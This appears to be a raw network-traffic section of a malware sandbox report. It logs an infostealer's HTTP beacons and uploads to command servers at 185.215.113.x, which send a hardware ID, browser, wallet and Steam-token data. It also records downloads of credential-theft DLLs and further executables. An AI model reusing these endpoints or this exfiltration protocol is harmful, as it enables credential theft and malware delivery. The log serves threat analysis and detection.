Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBGIDAEHCFIDGCBGIIHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 47 49 44 41 45 48 43 46 49 44 47 43 42 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 38 46 30 38 41 31 36 43 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 47 49 44 41 45 48 43 46 49 44 47 43 42 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 47 49 44 41 45 48 43 46 49 44 47 43 42 47 49 49 2d 2d 0d 0a Data Ascii: ------FCFBGIDAEHCFIDGCBGIIContent-Disposition: form-data; name="hwid"AE8F08A16C9A291931458------FCFBGIDAEHCFIDGCBGIIContent-Disposition: form-data; name="build"puma------FCFBGIDAEHCFIDGCBGII--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFBHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 2d 2d 0d 0a Data Ascii: ------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="message"browsers------IEHIIIJDAAAAAAKECBFB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBFCAEBFIJJKFHDAECHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 46 43 41 45 42 46 49 4a 4a 4b 46 48 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 46 43 41 45 42 46 49 4a 4a 4b 46 48 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 46 43 41 45 42 46 49 4a 4a 4b 46 48 44 41 45 43 2d 2d 0d 0a Data Ascii: ------JJDBFCAEBFIJJKFHDAECContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------JJDBFCAEBFIJJKFHDAECContent-Disposition: form-data; name="message"plugins------JJDBFCAEBFIJJKFHDAEC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEHHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 2d 2d 0d 0a Data Ascii: ------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="message"fplugins------DGDAEHCBGIIJJJJKKKEH--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJKHost: 185.215.113.206Content-Length: 8443Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDBFCBGDBKKECBFCGIEHost: 185.215.113.206Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAEGHIJEHJDHIDHIDAEHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHJJJDAFBKEBGDGHCGDHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 44 2d 2d 0d 0a Data Ascii: ------BFHJJJDAFBKEBGDGHCGDContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------BFHJJJDAFBKEBGDGHCGDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BFHJJJDAFBKEBGDGHCGDContent-Disposition: form-data; name="file"------BFHJJJDAFBKEBGDGHCGD--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIECFBAAAFHIIDGCGCBFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 2d 2d 0d 0a Data Ascii: ------FIECFBAAAFHIIDGCGCBFContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------FIECFBAAAFHIIDGCGCBFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FIECFBAAAFHIIDGCGCBFContent-Disposition: form-data; name="file"------FIECFBAAAFHIIDGCGCBF--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 43 37 36 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42C76B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJEGDGIJECGCBGCGHDGHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKFIJDHJEGIDHJKKKJJHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="message"wallets------CAKFIJDHJEGIDHJKKKJJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECBAKFBGDGCBGDBAECHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 2d 2d 0d 0a Data Ascii: ------BKECBAKFBGDGCBGDBAECContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------BKECBAKFBGDGCBGDBAECContent-Disposition: form-data; name="message"files------BKECBAKFBGDGCBGDBAEC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDHJKFIECAAKFIJJKJHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 2d 2d 0d 0a Data Ascii: ------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="file"------EHJDHJKFIECAAKFIJJKJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIEGHJEGHJKFIEBFHJKHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 2d 2d 0d 0a Data Ascii: ------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="message"ybncbhylepme------CGIEGHJEGHJKFIEBFHJK--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 36 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001605001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIDGDHCGCBAKFHIIIIIHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 2d 2d 0d 0a Data Ascii: ------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GHIDGDHCGCBAKFHIIIII--
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 36 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001606001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGHCAKKFBGDHJJJKECFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 48 43 41 4b 4b 46 42 47 44 48 4a 4a 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 38 46 30 38 41 31 36 43 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 48 43 41 4b 4b 46 42 47 44 48 4a 4a 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 48 43 41 4b 4b 46 42 47 44 48 4a 4a 4a 4b 45 43 46 2d 2d 0d 0a Data Ascii: ------CBGHCAKKFBGDHJJJKECFContent-Disposition: form-data; name="hwid"AE8F08A16C9A291931458------CBGHCAKKFBGDHJJJKECFContent-Disposition: form-data; name="build"puma------CBGHCAKKFBGDHJJJKECF--
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 36 30 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001607001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 36 30 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001608001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFBFCBGHDGCFHJJECAFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 38 46 30 38 41 31 36 43 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 2d 2d 0d 0a Data Ascii: ------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="hwid"AE8F08A16C9A291931458------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="build"puma------BAFBFCBGHDGCFHJJECAF--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
